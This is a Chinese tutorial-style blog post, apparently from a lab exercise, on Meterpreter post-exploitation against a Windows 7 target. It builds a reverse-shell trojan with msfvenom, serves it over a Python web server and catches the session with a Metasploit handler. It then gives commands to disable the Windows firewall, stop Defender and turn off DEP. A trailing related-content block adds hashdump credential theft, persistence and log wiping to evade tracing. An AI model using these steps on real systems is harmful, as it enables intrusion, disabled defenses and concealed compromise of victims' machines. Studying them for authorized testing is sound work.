权限维持——Meterpreter后渗透阶段之关闭防火墙与杀毒软件

学习目标

利用Meterpreter的shell操作windows命令执行关闭防火墙与杀毒软件

实验环境

攻击机:kali
靶机:windows7

实验内容

步骤一:建立session

1.打开一个终端,输入以下命令生成一个windos系统的木马

命令:msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=kali的IP lport=1234 -f exe > msf.exe

在这里插入图片描述

2.利用python在当前目录开启一个http服务,使靶机通过http服务将上述生成的木马进行下载。

命令:python -m http.server

在这里插入图片描述

3.进入到靶机中,使用浏览器对攻击机的ip:8000端口进行访问,并对刚生成的msf.exe文件点击进行下载
在这里插入图片描述

4.回到攻击机中,启动msfconsole

命令:msfconsole

在这里插入图片描述

5.设置我们需要使用到的监听模块 exploit/multi/handler

命令:use exploit/multi/handler

在这里插入图片描述

6.首先设置payload,需要和我们生成的木马文件的payload一致,接着设置LHOST和LPOR参数,同步生成的木马中设置的参数,并查看是否设置成功,依次执行以下命令

命令 set payload windows/x64/meterpreter/reverse_tcp
     set lhost kali的IP
​     set lport 1234

在这里插入图片描述

7.参数设置好后开始执行监听

命令:exploit

在这里插入图片描述

8.进入到靶机中,对木马程序msf.exe进行双击运行。此时攻击机的metasploit会显示由新的session生成,即表示已经获取到了靶机的meterpreter shell
在这里插入图片描述

9.在当前的Meterpreter界面上输入? 即可查看帮助命令
在这里插入图片描述

10.输入命令background即可将当前的Meterpreter Shell放到后台
11.输入sessions可查看当前所有的session会话
12.输入session -i SesssionID即可进入指定的Meterpreter Shell界面
在这里插入图片描述

步骤二:后渗透之关闭防火墙

1.进入windows shell终端

命令:shell

在这里插入图片描述

2.解决显示乱码

命令:chcp 65001

在这里插入图片描述

3.尝试关闭/打开windows防火墙(需管理员及以上权限)

开启命令:netsh advfirewall set allprofiles state on
关闭命令:netsh advfirewall set allprofiles state off

在这里插入图片描述

4.关闭Denfender

命令:net stop windefend

在这里插入图片描述

5.关闭DEP

命令:Bcdedit.exe /set {current} nx AlwaysOff

在这里插入图片描述

总结

  meterpretershell作为渗透模块有很多有用的功能,比如添加一个用户、隐藏一些东西、打开shell、得到用户密码、上传下载远程主机的文件、运行cmd.exe、捕捉屏幕、得到远程控制权、捕获按键信息、清除应用程序、显示远程主机的系统信息、显示远程机器的网络接口和IP地址等信息
  另外meterpreter能够躲避入侵检测系统。在远程主机上隐藏自己,它不改变系统硬盘中的文件,因此HIDS[基于主机的入侵检测系统]很难对它做出响应。此外它在运行的时候系统时间是变化的,所以跟踪它或者终止它对于一个有经验的人也会变得非常困难。
  最后,meterpreter还可以简化任务创建多个会话。可以来利用这些会话进行渗透。

  • 10
    点赞
  • 13
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Meterpreter是一种强大的后渗透工具,它可以在目标机器上执行各种命令和操作,包括文件系统访问、进程管理、网络扫描、密码破解、漏洞利用等等。在使用Meterpreter进行后渗透时,可以采取以下几个步骤: 1. 获取系统信息:使用sysinfo命令可以获取目标系统的详细信息,包括操作系统版本、硬件配置、用户信息等等,这些信息有助于后续的攻击操作。 2. 收集凭证信息:使用hashdump命令可以获取目标系统上保存的用户密码哈希值,然后可以使用破解工具进行破解,从而获取有效的登录凭证。 3. 扫描网络和主机:使用portscan和subnet命令可以对目标网络进行扫描,发现开放的服务和漏洞,然后可以使用exploit模块进行攻击。 4. 接管会话和持久化:使用migrate命令可以将Meterpreter会话转移到目标系统中的其他进程中,从而提高攻击的稳定性和隐蔽性。同时,还可以使用persist命令将Meterpreter程序持久化到目标系统中,以便于下次连接。 5. 进行攻击操作:利用Meterpreter的各种模块和命令,可以进行各种攻击操作,包括远程执行命令、上传下载文件、横向移动、权限提升、漏洞利用等等。 6. 残留清理:完成攻击后,应该进行残留的清理工作,包括删除日志文件、清除历史记录、删除痕迹等等,以避免被发现和追踪。 总之,Meterpreter是一款非常强大的后渗透工具,可以帮助渗透测试人员和黑客更好地进行攻击和渗透测试工作。但是,在使用Meterpreter进行攻击时,应该遵循道德和法律的原则,避免对他人造成不必要的损害和危害。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值